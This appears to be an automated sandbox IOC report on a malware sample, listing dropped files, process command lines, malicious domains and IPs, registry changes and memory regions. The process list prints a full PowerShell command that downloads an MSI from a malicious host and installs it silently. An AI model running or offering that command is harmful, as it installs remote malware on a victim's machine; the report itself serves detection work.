IOC Report

loading gifFilesProcessesURLsDomainsIPsRegistryMemdumps10864201,00010010Label

Files

File Path
Type
Category
Malicious
Download
C:\Users\Public\abc.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {8F6B6876-1007-41E4-ABB3-F464EFC882DC}, Number of Words: 10, Subject: Pharyngeal, Author: Overfold Strength, Name of Creating Application: Advanced Installer 18.0 build 1a235518, Template: x64;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
dropped
malicious
C:\Users\user\AppData\Roaming\Causerie\VSAddIn.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\17d8dc5c
PNG image data, 2240 x 1175, 8-bit/color RGB, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\1840cd8d
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtah0fxw.upj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5xr4ka0.xl0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\fa0cd814
PNG image data, 2240 x 1175, 8-bit/color RGB, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\fa98ff2f
data
dropped
C:\Users\user\AppData\Local\Temp\iaji
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 25 18:21:18 2025, mtime=Tue Mar 25 14:00:38 2025, atime=Tue Mar 25 18:21:18 2025, length=721294203, window=hide
dropped
C:\Users\user\AppData\Local\Temp\iqeksqckh
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\mrwoqufre
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Windows\Installer\47838e.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {8F6B6876-1007-41E4-ABB3-F464EFC882DC}, Number of Words: 10, Subject: Pharyngeal, Author: Overfold Strength, Name of Creating Application: Advanced Installer 18.0 build 1a235518, Template: x64;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
dropped
C:\Windows\Installer\MSI84F5.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\MSI8544.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\MSI8574.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\MSI8595.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\MSI85F3.tmp
data
dropped
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Windows\Temp\~DF524F57AE352AC43F.TMP
data
dropped
C:\Windows\Temp\~DFCBA85B4EBA3344E1.TMP
Composite Document File V2 Document, Cannot read section info
dropped
There are 13 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\cmd.exe
cmd /C ""powershell.exe" -c "iwr https://ownlifeforyouwithme.com/plo -OutFile C:\Users\Public\abc.msi; msiexec /i C:\Users\Public\abc.msi /qn""
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -c "iwr https://ownlifeforyouwithme.com/plo -OutFile C:\Users\Public\abc.msi; msiexec /i C:\Users\Public\abc.msi /qn"
malicious
C:\Windows\System32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
malicious
C:\Users\user\AppData\Roaming\Causerie\VSAddIn.exe
"C:\Users\user\AppData\Roaming\Causerie\VSAddIn.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
malicious
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\more.com
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
malicious
C:\Users\user\AppData\Roaming\VSAddIn\VSAddIn.exe
"C:\Users\user\AppData\Roaming\VSAddIn\VSAddIn.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
malicious
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\more.com
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i C:\Users\Public\abc.msi /qn
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 912C6CA145F3CDB6CC2846AFAA67EA02
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 6 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://ownlifeforyouwithme.com/plo
104.21.78.106
malicious
https://pastebin.com/raw/m10GT1YV
unknown
https://www.carthagosoft.net/MemInfo.php
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://www.fontbureau.com
unknown
http://www.fontbureau.com/designersG
unknown
https://downlfkzfoqkajada.com/08.qtt
172.67.160.115
http://www.fontbureau.com/designers/?
unknown
http://www.vmware.com/0
unknown
http://www.founder.com.cn/cn/bThe
unknown
http://www.fontbureau.com/designers?
unknown
https://www.paypal.com/donate/?hosted_button_id=7SP5W2578S764
unknown
https://www.paypal.com/cgi-bin/webscr?cmd=_donations&item_name=Carthago%20Software%20Donation&busine
unknown
http://www.vmware.com/0/
unknown
http://217.208.112.194/ver/curr_ver.txt
unknown
http://www.tiro.com
unknown
http://www.fontbureau.com/designers
unknown
http://www.google.com/search?q=
unknown
http://www.symauth.com/cps0(
unknown
http://www.carthagosoft.net/meminfo.upd
unknown
http://www.carterandcone.coml
unknown
http://purl.oen
unknown
http://www.sajatypeworks.com
unknown
https://www.carthagosoft.net/Support.php
unknown
http://www.typography.netD
unknown
http://www.fontbureau.com/designers/cabarga.htmlN
unknown
http://www.founder.com.cn/cn/cThe
unknown
http://www.galapagosdesign.com/staff/dennis.htm
unknown
http://www.founder.com.cn/cn
unknown
http://www.fontbureau.com/designers/frere-user.html
unknown
http://www.symauth.com/rpa00
unknown
http://www.jiyu-kobo.co.jp/
unknown
http://www.info-zip.org/
unknown
http://www.galapagosdesign.com/DPlease
unknown
http://www.fontbureau.com/designers8
unknown
http://www.fonts.com
unknown
https://www.carthagosoft.net
unknown
http://www.urwpp.deDPlease
unknown
http://www.zhongyicts.com.cn
unknown
http://www.sakkal.com
unknown
http://www.carthagosoft.net
unknown
There are 31 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ownlifeforyouwithme.com
104.21.78.106
malicious
bg.microsoft.map.fastly.net
199.232.210.172
downlfkzfoqkajada.com
172.67.160.115
pki-goog.l.google.com
142.250.65.227
c.pki.goog
unknown

IPs

IP
Domain
Country
Malicious
46.101.232.143
unknown
Netherlands
malicious
104.21.78.106
ownlifeforyouwithme.com
United States
malicious
172.67.160.115
downlfkzfoqkajada.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\478390.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\478390.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Microsoft\Installer\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Components\17508BAE3F667104A812D3165932C93E
7F5952DCE232D294EB08BB741CC3688A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Components\350C522B425A12B4BA420F6C6E49A14C
7F5952DCE232D294EB08BB741CC3688A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Components\2143C288AC86E6D4A92F6956BD4F0589
7F5952DCE232D294EB08BB741CC3688A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Components\EAE959990BD456F48B6906EF50279306
7F5952DCE232D294EB08BB741CC3688A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Overfold Strength\Pharyngeal\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Overfold Strength\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Overfold Strength\Pharyngeal\32-bit\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Causerie\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Microsoft\Installer\{CD2595F7-232E-492D-BE80-BB47C13C86A8}\
HKEY_CURRENT_USER\SOFTWARE\Overfold Strength\Pharyngeal
Path
HKEY_CURRENT_USER\SOFTWARE\Overfold Strength\Pharyngeal
Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
LocalPackage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
AuthorizedCDFPrefix
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
Comments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
Contact
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
HelpLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
HelpTelephone
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
InstallLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
InstallSource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
ModifyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
NoModify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
Publisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
Readme
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
EstimatedSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
URLInfoAbout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
URLUpdateInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
VersionMajor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
VersionMinor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
Language
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
AuthorizedCDFPrefix
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
Comments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
Contact
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
HelpLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
HelpTelephone
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
InstallLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
InstallSource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
ModifyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
NoModify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
Publisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
Readme
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
EstimatedSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
URLInfoAbout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
URLUpdateInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
VersionMajor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
VersionMinor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
Language
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\611D244AFDDC57E4C8F1E1E07B7C3ECC
7F5952DCE232D294EB08BB741CC3688A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\InstallProperties
DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD2595F7-232E-492D-BE80-BB47C13C86A8}
DisplayName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Features\7F5952DCE232D294EB08BB741CC3688A
MainFeature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\Features
MainFeature
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Features\7F5952DCE232D294EB08BB741CC3688A
AI64BitFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\Features
AI64BitFiles
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Features\7F5952DCE232D294EB08BB741CC3688A
AI32BitFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\Features
AI32BitFiles
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Features\7F5952DCE232D294EB08BB741CC3688A
AIOtherFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\Features
AIOtherFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1002\Products\7F5952DCE232D294EB08BB741CC3688A\Patches
AllPatches
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A
ProductName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A
PackageCode
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A
Language
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A
Version
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A
Assignment
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A
AdvertiseFlags
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A
InstanceType
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A
AuthorizedLUAApp
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A
DeploymentFlags
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\UpgradeCodes\611D244AFDDC57E4C8F1E1E07B7C3ECC
7F5952DCE232D294EB08BB741CC3688A
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A\SourceList
PackageName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A\SourceList\Net
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A\SourceList\Media
DiskPrompt
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A\SourceList\Media
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A
Clients
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\7F5952DCE232D294EB08BB741CC3688A\SourceList
LastUsedSource
There are 98 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
36F0000
trusted library allocation
page read and write
malicious
4A60000
trusted library section
page read and write
malicious
42F3000
trusted library allocation
page read and write
malicious
412D000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
462A000
trusted library allocation
page read and write
malicious
25B1000
trusted library allocation
page read and write
malicious
3023000
trusted library allocation
page read and write
malicious
3619000
trusted library allocation
page read and write
malicious
2AF1000
trusted library allocation
page read and write
11FA000
unkown
page write copy
18141670000
heap
page read and write
5500000
trusted library allocation
page read and write
5721000
unkown
page read and write
69B000
heap
page read and write
6C0000
heap
page read and write
AC6000
trusted library allocation
page execute and read and write
23AD8C3C000
trusted library allocation
page read and write
3102000
trusted library allocation
page read and write
D9000
stack
page read and write
352D000
trusted library allocation
page read and write
23AAA250000
direct allocation
page read and write
28A1000
trusted library allocation
page read and write
13A6000
unkown
page read and write
16D0000
heap
page read and write
3512000
trusted library allocation
page read and write
3653000
trusted library allocation
page read and write
310D000
trusted library allocation
page read and write
33BE000
stack
page read and write
516000
unkown
page readonly
23AD8A99000
trusted library allocation
page read and write
3436000
trusted library allocation
page read and write
68C000
heap
page read and write
3823000
trusted library allocation
page read and write
1127000
unkown
page execute read
31B9000
trusted library allocation
page read and write
37DC000
trusted library allocation
page read and write
280C000
trusted library allocation
page read and write
2689000
trusted library allocation
page read and write
23AD8B04000
trusted library allocation
page read and write
30B2000
trusted library allocation
page read and write
7AA7000
heap
page read and write
30FC000
trusted library allocation
page read and write
3510000
trusted library allocation
page read and write
31BE000
stack
page read and write
D4D0000
trusted library allocation
page execute and read and write
294F000
trusted library allocation
page read and write
D65000
unkown
page execute read
A0D4000
trusted library allocation
page read and write
54F000
unkown
page readonly
37A8000
trusted library allocation
page read and write
28B6000
trusted library allocation
page read and write
1067000
unkown
page execute read
11DB000
unkown
page read and write
23AD8243000
heap
page read and write
23AA9B7C000
direct allocation
page read and write
23AA9AA7000
direct allocation
page read and write
3710000
trusted library allocation
page read and write
14E0000
trusted library allocation
page read and write
1376000
unkown
page read and write
378F000
trusted library allocation
page read and write
78D0000
heap
page read and write
32B0000
trusted library allocation
page read and write
53DD000
direct allocation
page read and write
5661000
unkown
page read and write
44E000
unkown
page readonly
3356000
trusted library allocation
page read and write
35C9000
trusted library allocation
page read and write
4B60000
heap
page read and write
3400000
trusted library allocation
page read and write
5BCE000
stack
page read and write
3727000
trusted library allocation
page read and write
2994000
trusted library allocation
page read and write
120B000
unkown
page read and write
23AD8D60000
trusted library allocation
page read and write
3366000
trusted library allocation
page read and write
26B3000
trusted library allocation
page read and write
3174000
heap
page read and write
120D000
unkown
page write copy
33E5000
trusted library allocation
page read and write
2B12000
trusted library allocation
page read and write
14A6000
heap
page read and write
2823000
trusted library allocation
page read and write
339A000
trusted library allocation
page read and write
29CA000
trusted library allocation
page read and write
34D7000
trusted library allocation
page read and write
23AA80ED000
heap
page read and write
2691000
trusted library allocation
page read and write
556E000
stack
page read and write
32AE000
trusted library allocation
page read and write
23AD8CA3000
trusted library allocation
